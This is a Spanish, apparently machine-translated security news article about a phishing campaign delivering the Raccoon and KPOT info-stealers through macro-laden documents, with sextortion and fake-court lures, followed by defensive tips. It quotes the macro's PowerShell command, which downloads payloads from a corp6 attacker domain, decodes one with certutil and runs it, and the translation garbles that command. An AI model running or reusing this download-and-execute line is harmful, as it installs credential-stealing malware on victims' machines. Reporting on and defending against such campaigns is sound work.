Los investigadores de X-Force descubrieron una campaña maliciosa con Info-stealer llamada "Raccoon" y "KPOT" que apunta a los usuarios de Windows a través de correos electrónicos falsos para robar datos confidenciales.
El malware Raccoon se cree que se originó en los piratas informáticos de habla rusa y atacó activamente a organizaciones financieras y gubernamentales el año pasado con Fallout & RIG Exploit Kits .
Tipo de intentos de infectar a los usuarios de Windows
Esta campaña de malware entrega la carga útil por correo electrónico que contiene un documento armado que está firmado con el software DocuSign, DocuSign es una compañía conocida por permitir a las organizaciones administrar documentos electrónicos.
El sujeto del documento se conoce como "archivos" o "papeleo" para tentar a las víctimas a abrir un archivo y ejecutar la carga útil en la máquina de ventanas de la víctima.
Otra muestra de correo electrónico de secuela de sextortion que recopilaron los investigadores contiene el siguiente contenido corporal y se declara a sí mismo como "el equipo de hackers de Red Skull"
“Se ha robado la información privada de su amigo”, “La cuenta de su colega se vio comprometida” o “Tenemos acceso a la cuenta de su amigo”.
Además, el atacante envía una imagen íntima de su novia y amenazó a la persona para distribuir la imagen a su lista de contactos completa si las víctimas no pagan el rescate exigido de 500 dólares.
Una muestra muy reciente que descubrieron los investigadores de IBM X-Force , haciéndose pasar por un "mensaje de acusación" oficial enviado por el tribunal. Se supone que esto asusta a las víctimas para que crean que en realidad son demandadas en los tribunales por algo que no saben.
El cuerpo del correo electrónico insta a las víctimas a examinar e imprimir los documentos y también da un plazo para una respuesta y explica las consecuencias si las víctimas no abren el documento malicioso.
Estos son los principales intentos de tentar a las víctimas a abrir el archivo adjunto para que el atacante ejecute la carga útil de malware.
Una vez abierto el documento malicioso, sigue instando a los usuarios a hacer clic en "Habilitar contenido" que les ayuda a ejecutar la macro en la máquina con Windows.
Todos los correos electrónicos contienen exactamente el mismo contenido de macro. Tan pronto como se ejecutan las macros, se ejecuta un comando de PowerShell en segundo plano.
powershell -windowstyle oculto Import-Module BitsTransfer; Start-BitsTransfer -Source http://corp6.site/IeuAje.dat,http://corp6.site/neaJk.dat,http://corp6.site/QpYe.dat -Destination "$ env: TEMP \ vido. com "," $ env: TEMP \ sfera "," $ env: TEMP \ QpYe.com "; Set-Location -Path "$ env: TEMP"; certutil -decode sfera tref; Start-Process vido.com -ArgumentList tref
El comando anterior descargará el ladrón de información Raccoon alojado en el sitio corp6 [.].
En la campaña reciente, entregue el KPOT y otro ladrón de información a través de nuevas URL codificadas.
Vale la pena mencionar que hemos visto información robando malware distribuido comparativamente en los dominios corp5 [.] Sitio, corp6 [.] Sitio y ahora corp7 [.] Sitio. Los investigadores dijeron.
- No haga clic ni abra enlaces en correos electrónicos directamente, en su lugar escriba la URL principal en su navegador o busque la marca / empresa a través de su motor de búsqueda preferido.
- Asegúrese de que el software antivirus y los archivos asociados estén actualizados.
- Busque signos existentes de los IOC indicados en su entorno.
- Bloquee todos los IOC basados en URL e IP en el firewall, IDS, puertas de enlace web, enrutadores u otros dispositivos basados en el perímetro, un curso de acción, recursos o aplicaciones para remediar esta amenaza.
- Mantenga las aplicaciones y los sistemas operativos en ejecución en el nivel de parche lanzado actual.
Fuente: gbhackers


0 Comentarios